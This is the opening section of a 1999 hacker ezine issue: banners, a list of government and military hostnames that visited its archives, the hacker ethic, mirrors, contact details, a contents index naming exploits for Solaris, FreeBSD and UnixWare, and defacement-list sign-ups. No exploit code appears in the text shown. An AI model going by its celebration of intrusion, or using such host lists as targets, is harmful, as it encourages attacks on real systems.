💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › HWA › hwa-hn48.… captured on 2022-01-08 at 16:01:12.
⬅️ Previous capture (2021-12-04)
-=-=-=-=-=-=-
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99/2000=] Number 48 Volume 1 1999 Dec 26th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
(�`�._(�`�._(�`�._(�`�._( � xmas! � )_.���)_.���)_.���)_.���)
__ ____ __ __ __ _____ ____ __
/ / / / // / ____ ____ __ __ / / / /___ / < /___/ / // / __ ______
/ /_/ / // /_/ __ \/ __ \/ / / / / /_/ / __ \/ // / __ / // /_/ / / /_ /
/ __ /__ __/ /_/ / /_/ / /_/ / / __ / /_/ / // / /_/ /__ __/ /_/ / / /_
/_/ /_/ /_/ / .___/ .___/\__, / /_/ /_/\____/_//_/\__,_/ /_/ \__, / /___/
/_/ /_/ /____/ /____/
The end is nigh!, cash in your bearer bonds! - sAs
I'm waiting for a $100,206,570 credit on my Visa bill! - Ed
Got plenty of ammo? did you remember to buy gun oil? - Ed
(�`�._(�`�._(�`�._(�`�._( � xmas! � )_.���)_.���)_.���)_.���)
OH YA, AND HAPPY NEW YEARS
Coming soon!
__ __ __
___________________ _/ /______/ /_ ____ _____ ____/ /
/ ___/ ___/ ___/ __ `/ __/ ___/ __ \ / __ `/ __ \/ __ /
(__ ) /__/ / / /_/ / /_/ /__/ / / / / /_/ / / / / /_/ /
/____/\___/_/ \__,_/\__/\___/_/ /_/ \__,_/_/ /_/\__,_/
_________ (_) __/ __/ (_)___________ _____ / /
/ ___/ __ \/ / /_/ /_ / / ___/ ___/ / / / _ \/ /
(__ ) / / / / __/ __/ / (__ |__ ) /_/ / __/_/
/____/_/ /_/_/_/ /_/ /_/____/____/\__,_/\___(_)
(�`�._(�`�._(�`�._(�`�._( � w00t! � )_.���)_.���)_.���)_.���)
____
/ ___|_____ _____ _ __ __ _ __ _ ___
| | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
| |__| (_) \ V / __/ | | (_| | (_| | __/
\____\___/ \_/ \___|_| \__,_|\__, |\___|
|___/
This is #48 covering Dec 19th to Dec 26th
* Also contains some older material missed from
past issues over the last few weeks.
==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================
Mailing list members: 468 Can we bump this up somewhat? spread the word!
==========================================================================
Today the spotlight may be on you, some interesting machines that
have accessed these archives recently...
_ _ _
| | | | ___ | |_
| |_| |/ _ \| __|
| _ | (_) | |_
|_| |_|\___/ \__|
_ _ _ _
| | | (_) |
| |__| |_| |_ ___
| __ | | __/ __|
| | | | | |_\__ \
|_| |_|_|\__|___/
.gov and .mil activity
cofcs71.aphis.usda.gov
samds4.sam.pentagon.mil
eg-016-045.eglin.af.mil
pacfa.evepier.navy.mil
obgate.hill.af.mil
biglost.inel.gov
marshall.state.gov
flatline.arc.nasa.gov
mars.istac.gov
gateway1.osd.mil
gateway3.osd.mil
elan5172.cbcph.navy.mil
proxy.gintic.gov.sg
doegate.doe.gov
sunspot.gsfc.nasa.gov
gate1.mcbh.usmc.mil
homer.nawcad.navy.mil
maggie.nawcad.navy.mil
lisa.nawcad.navy.mil
msproxy.transcom.mil
b-kahuna.hickam.af.mil
sc034ws109.nosc.mil
infosec.se
gate2.mcbutler.usmc.mil
sc034ws109.nosc.mil
shq-ot-1178.nosc.mil
dhcp-036190.scott.af.mil
mcreed.lan.teale.ca.gov
dodo.nist.gov
mc1926.mcclellan.af.mil
kwai11.nsf.gov
enduser.faa.gov
vasfw02,fdic.gov
lisa.defcen.gov.au
ps1.pbgc.gov
guardian.gov.sg
amccss229116.scott.af.mil
sc022ws224.nosc.mil
sheppard2.hurlburt.af.mil
marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
fhu-ed4ccdf.fhu.disa.mil
citspr.tyndall.af.mil
kelsatx2.kelly.af.mil
kane.sheppard.af.mil
relay5.nima.mil
host.198-76-34-33.gsa.gov
ntsrvr.vsw.navy.mil
saic2.nosc.mil
wygate.wy.blm.gov
mrwilson.lanl.gov
p722ar.npt.nuwc.navy.mil
ws088228.ramstein.af.mil
car-gw.defence.gov.au
unknown-c-23-147.latimes.com
nytgate1.nytimes.com
There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good Is It Worth It Followup to see
our boys keeping up with the news... - Ed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
_ ___ ___ _ ___
| | | \ \ / / \ | |__ __ ___ __/ _ \ _ __ _ __ _____ _____
| |_| |\ \ /\ / / _ \ | '_ \ / _` \ \/ / | | | '__| '_ \ / _ \ \ /\ / / __|
| _ | \ V V / ___ \ _| | | | (_| |> <| |_| | |_ | | | | __/\ V V /\__ \
|_| |_| \_/\_/_/ \_(_)_| |_|\__,_/_/\_\\___/|_(_)|_| |_|\___| \_/\_/ |___/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# #
@ The HWA website is sponsored by CUBESOFT communications I highly @
# recommend you consider these people for your web hosting needs, #
@ @
# Web site sponsored by CUBESOFT networks http://www.csoft.net #
@ check them out for great fast web hosting! @
# #
# http://www.csoft.net/~hwa @
@ #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
_ _ _ _ _____ _ _ _
| | | | __ _ ___| | _____ _ __( )__| ____| |_| |__ (_) ___
| |_| |/ _` |/ __| |/ / _ \ '__|/ __| _| | __| '_ \| |/ __|
| _ | (_| | (__| < __/ | \__ \ |___| |_| | | | | (__
|_| |_|\__,_|\___|_|\_\___|_| |___/_____|\__|_| |_|_|\___|
Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a perjorative.
Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:
1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
degrees, age, race, or position.
5 - You create art and beauty on a computer,
6 - Computers can change your life for the better.
The Internet as a whole reflects this ethic.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
_____ _ _ _
| ___|__ _ __ _ __ ___ __ _| |_| |_(_)_ __ __ _
| |_ / _ \| '__| '_ ` _ \ / _` | __| __| | '_ \ / _` |
| _| (_) | | | | | | | | (_| | |_| |_| | | | | (_| |
|_| \___/|_| |_| |_| |_|\__,_|\__|\__|_|_| |_|\__, |
|___/
A Comment on FORMATTING:
Oct'99 - Started 80 column mode format, code is still left
untouched since formatting will destroy syntax.
I received an email recently about the formatting of this
newsletter, suggesting that it be formatted to 75 columns
in the past I've endevoured to format all text to 80 cols
except for articles and site statements and urls which are
posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in
1024x768 mode with UEDIT.... - Ed
BTW if anyone can suggest a better editor than UEDIT for
this thing send me some email i'm finding it lacking in
certain areas. Must be able to produce standard ascii.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
__ __ _
| \/ (_)_ __ _ __ ___ _ __ ___
| |\/| | | '__| '__/ _ \| '__/ __|
| | | | | | | | | (_) | | \__ \
|_| |_|_|_| |_| \___/|_| |___/
New mirror sites
*** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW ***
*** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***
http://datatwirl.intranova.net * NEW *
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/
* Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed
the file size limitations imposed by the sites :-( please
only use these if no other recourse is available.
*** Most likely to be up to date other than the main site.
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.
http://www.csoft.net/~hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
____ _
/ ___| _ _ _ __ ___ _ __ ___(_)___
\___ \| | | | '_ \ / _ \| '_ \/ __| / __|
___) | |_| | | | | (_) | |_) \__ \ \__ \
|____/ \__, |_| |_|\___/| .__/|___/_|___/
|___/ |_|
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to compliment such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, its a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ...
=-----------------------------------------------------------------------=
We could use some more people joining the channel, its usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
**************************************************************************
"If live is a waste of time and time is a waste of life, then lets all get
wasted and have the time of our lives"
- kf
____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|
Eris Free Net #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on the zine and around the ***
*** scene or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************
=--------------------------------------------------------------------------=
_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly). This is our new motto.
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
"The three most dangerous things in the world are a programmer with a
soldering iron, a hardware type with a program patch and a user with
an idea." - Unknown
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Socks proxies, Wingates and more from IRC4ALL....................
04.0 .. Cyberarmy Proxies, Accounts and Wingates etc (* If available)....
05.0 .. Belgium: Security of Banksys compromised.........................
06.0 .. Public access mail servers.......................................
07.0 .. Santa Claus about to lose his domain name for nonpayment? .......
08.0 .. Interview with NFO (Nine Forty One Group)........................
09.0 .. The History of IRC (Internet Relay Chat).........................
10.0 .. Pagoo Internet voice MailBox by Loophole/HHP.....................
11.0 .. Top 11 Stories of 1999 according to HNN..........................
12.0 .. AntiVirus scanning and misused tools.............................
13.0 .. RST Sets the Record Straight ....................................
14.0 .. Russian Politician Threatens Cyber Attack .......................
15.0 .. PCR-1000 Control Suite Released by Ghetto.org ...................
16.0 .. Nuclear Power Plant Y2K Readiness ...............................
17.0 .. New E-zines Released ............................................
18.0 .. Digi.no publishes Script Kiddie Rant ............................
19.0 .. w00w00 Con 1999..................................................
20.0 .. pops.c popmail scanner by duro...................................
21.0 .. Cypherpunks meeting announcement.................................
22.0 .. Microsoft security bulletin MS99-046 Windows NT 4.0 SP4 or SP5...
23.0 .. [ISN] Hacker Shootouts?..........................................
24.0 .. [ISN] 21 yr old secures $53Mil for high-tech startup.............
25.0 .. [ISN] Netscape Security Flaw Revealed............................
26.0 .. [ISN] Cyberterrorism hype........................................
27.0 .. [ISN] The Beijing Hack Attack....................................
28.0 .. [ISN] Most cybercrime goes unpunished............................
29.0 .. [ISN] Jubilant Zhirinovsky wants to hack western computers.......
30.0 .. [ISN] Tribe and Trinoo, two new virulent virii...................
31.0 .. [ISN] As New Year nears, threat of Net attack program mounts.....
32.0 .. [ISN] Hackers hack sites to promote hacking hiatus for y2k (!?)..
33.0 .. [ISN] How to report internet related crime.......................
34.0 .. [ISN] Ten risks of PKI (Public Key Infrastructure)...............
35.0 .. [ISN] Forbes says he'll ditch all crypto export controls.........
36.0 .. [ISN] Zyklon claims his crime was "no big deal" .................
37.0 .. [ISN] Security Wire Digest Volume 1..............................
38.0 .. mailx.c slackware 3.6 local exploit..............................
39.0 .. cmsdex.c Solaris (2.6 / 7.0) remote exploit......................
40.0 .. xsoldierx.c FreeBSD 3.3 local exploit by Brock Tellier...........
41.0 .. rpc.autofsd.c FreeBSD/misc remote exploit by guidob..............
42.0 .. iplenght.c Redhat 5.1 + Debian 2.1 DoS exploit by Andrea Arcangeli.
43.0 .. truck.c UnixWare 7.1 local explot by Brock Tellier...............
=-------------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA..........
Ha.Ha .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _
| | ___ __ _ __ _| |
| | / _ \/ _` |/ _` | |
| |__| __/ (_| | (_| | |
|_____\___|\__, |\__,_|_|
|___/
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _
/ ___|___ _ __ | |_ __ _ ___| |_ ___
| | / _ \| '_ \| __/ _` |/ __| __/ __|
| |__| (_) | | | | || (_| | (__| |_\__ \
\____\___/|_| |_|\__\__,_|\___|\__|___/
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net
Other methods:
Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use for lame questions!
My Preffered chat method: IRC Efnet in #HWA.hax0r.news
@HWA
00.2 Sources ***
~~~~~~~~~~~
____
/ ___| ___ _ _ _ __ ___ ___ ___
\___ \ / _ \| | | | '__/ __/ _ Y __|
___) | (_) | |_| | | | (_| __|__ \
|____/ \___/ \__,_|_| \___\___|___/
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) .....,............http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ s
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
win2kbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
PLEASE if you have any changes or additions for this section please
mail them to cruciphux@dok.org. Thank you.
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
http://www.hack.co.za/ Current exploits archive
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _ _
/ ___| _ _| |__ _ __ ___ (_)___ ___(_) ___ _ __ ___
\___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
|____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care wether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
ATTRITION.ORG's Website defacement mirror and announcement lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/mirror/attrition/
http://www.attrition.org/security/lists.html
--
defaced [web page defacement announce list]
This is a public LOW VOLUME (1) mail list to circulate news/info on
defaced web sites. To subscribe to Defaced, send mail to
majordomo@attrition.org with "subscribe defaced" in the BODY of
the mail.
There will be two types of posts to this list:
1. brief announcements as we learn of a web defacement.
this will include the site, date, and who signed the
hack. we will also include a URL of a mirror of the hack.
2. at the end of the day, a summary will be posted
of all the hacks of the day. these can be found
on the mirror site listed under 'relevant links'
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: mcintyre@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
(1) It is low volume on a normal day. On days of many defacements,
traffic may be increased. On a few days, it is a virtual mail
flood. You have been warned. ;)
-=-
--
defaced summary [web page defacement announce list]
This is a low traffic mail list to announce all publicly
defaced domains on a given day. To subscribe to Defaced-Summary, send mail to
majordomo@attrition.org with "subscribe defaced-summary" in the BODY of
the mail.
There will be ONE type of post to this list:
1. a single nightly piece of mail listing all reported
domains. the same information can be found on
http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
-=-
defaced GM [web page defacement announce list]
This is a low traffic mail list to announce all publicly
defaced government and military domains on a given day. To subscribe to
Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm"
in the BODY of the mail.
There will be ONE type of post to this list:
1. sporadic pieces of mail for each government (.gov)
or military (.mil) system defaced. the same information
can be found on http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is designed primarily for government and military
personell charged with tracking security incidents on
government run networks.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
--
defaced alpha [web page defacement announce list]
This is a low traffic mail list to announce via alpha-numeric
pagers, all publicly defaced government and military domains
on a given day. To subscribe to Defaced-Alpha, send mail to
majordomo@attrition.org with "subscribe defaced-alpha" in
the BODY of the mail.
There will be ONE type of post to this list:
1. sporadic pieces of mail for each government (.gov)
or military (.mil) system defaced. the information
will only include domain names. the same information
can be found on http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is designed primarily for government and military
personell charged with tracking security incidents on
government run networks. Further, it is designed for
quick response and aimed at law enforcement agencies like
DCIS and the FBI.
To subscribe to this list, a special mail will be sent to YOUR
alpha-numeric pager. A specific response must be made within
12 hours of receiving the mail to be subscribed. If the response
is not received, it is assumed the mail was not sent to your
pager.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
-=-
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
